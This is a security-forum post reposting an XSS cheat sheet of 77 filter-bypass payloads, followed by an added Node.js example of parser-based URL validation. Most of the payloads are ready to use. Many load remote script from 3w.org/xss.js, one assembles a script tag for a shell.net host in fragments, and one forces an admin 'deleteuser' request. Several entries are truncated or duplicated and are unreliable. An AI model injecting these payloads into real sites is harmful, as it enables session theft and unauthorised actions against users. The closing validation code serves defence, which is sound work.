It seems t00ls has relatively little material on XSS, so I'm copying over something good I came across; not sure whether any of you need to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (must have semicolons)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (requires being on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically don't work domestically, because there is nowhere they can be made use of
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript filters
\";alert('XSS');//
(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added after it (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS gets filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Original source: http://fuzzexp.org/u/0day/?p=14
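Most of the vectors above work by defeating string-based filters rather than the browser itself. As an added example (not part of this post or of the cheat sheet it copies), the Node.js snippet below shows the defender's counterpart: a check for URL-valued attributes (href, src, background and the like) that first decodes numeric character references and then hands the value to the WHATWG URL parser, which is the same algorithm browsers run. That parser drops tabs and newlines anywhere in the input, strips leading spaces and control characters, lowercases the scheme and canonicalises IPv4 hosts, so the case, whitespace and encoding variants in items 3-5, 11-14 and 19 all collapse to one rejected scheme, and the decimal, hex and octal hosts in items 70-72 and the trailing-dot host in item 76 normalise to one hostname. The base URL https://example.invalid/, the function names and the sample inputs are my own assumptions.

```javascript
// Added example (not from the cheat sheet above): parser-based validation
// of URL-valued attributes, contrasted with a naive string filter.
// Assumed: the page's origin is https://example.invalid/ (placeholder).

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Step 1: decode numeric character references the way the HTML parser does:
// &#106; and &#x6A;, and also the forms without a trailing semicolon (items 9
// and 10). Named references are left out for brevity; in a real deployment run
// the check on attribute values after HTML parsing instead of on raw markup.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// A typical string-based "block javascript:" filter. Returns true when the
// filter would let the value through.
function naiveFilterAllows(value) {
  return !value.toLowerCase().startsWith('javascript:');
}

// Step 2: resolve the decoded value with the WHATWG URL parser against the
// page's base and allow-list the resulting scheme. Relative and
// protocol-relative URLs resolve to the base scheme and therefore pass.
function isSafeUrl(value, base = 'https://example.invalid/') {
  let url;
  try {
    url = new URL(decodeNumericEntities(value), base);
  } catch {
    return false; // unparseable input is rejected, not "fixed up"
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// For host allow-lists (items 70-76): compare the parser's canonical hostname,
// never the raw string. Decimal, hex and octal IPv4 spellings all come back as
// dotted decimal; the trailing dot of "www.google.com." is stripped here so it
// matches "www.google.com".
function canonicalHost(value, base = 'https://example.invalid/') {
  const url = new URL(decodeNumericEntities(value), base);
  return url.hostname.replace(/\.$/, '');
}

// Constructed sample inputs following the shapes of the vectors listed above.
const SAMPLES = [
  "javascript:alert('XSS')",        // plain
  "JaVaScRiPt:alert('XSS')",        // mixed case (item 4)
  " javascript:alert('XSS')",       // leading space (item 19)
  "jav\tascript:alert('XSS')",      // embedded tab (item 11)
  "jav\nascript:alert('XSS')",      // embedded newline (item 13)
  "jav\rascript:alert('XSS')",      // embedded carriage return (item 14)
  "&#106;avascript:alert('XSS')",   // HTML-encoded first letter (item 5)
  "&#x6A;avascript:alert('XSS')",   // hex reference (item 10)
  'vbscript:msgbox("XSS")',         // another active scheme (item 40)
  'https://3w.org/XSS/xss.js',      // ordinary absolute URL
  '/images/logo.png',               // relative URL
];

// Per sample: what the naive filter and the parser-based check each decide.
function compareFilters(samples = SAMPLES) {
  return samples.map((value) => ({
    value,
    naiveAllows: naiveFilterAllows(value),
    safe: isSafeUrl(value),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const row of compareFilters()) console.log(row);
  console.log(canonicalHost('http://3232235521/'));
}
```

Run it with node; compareFilters() returns, for each sample, whether the naive startsWith('javascript:') filter and the parser-based check would let the value through, and the two disagree exactly on the leading-space and entity-encoded variants. Protocol-relative URLs like item 74 pass the scheme check because they resolve to the page's own scheme; if a host allow-list is also required, compare canonicalHost() output rather than the raw attribute text.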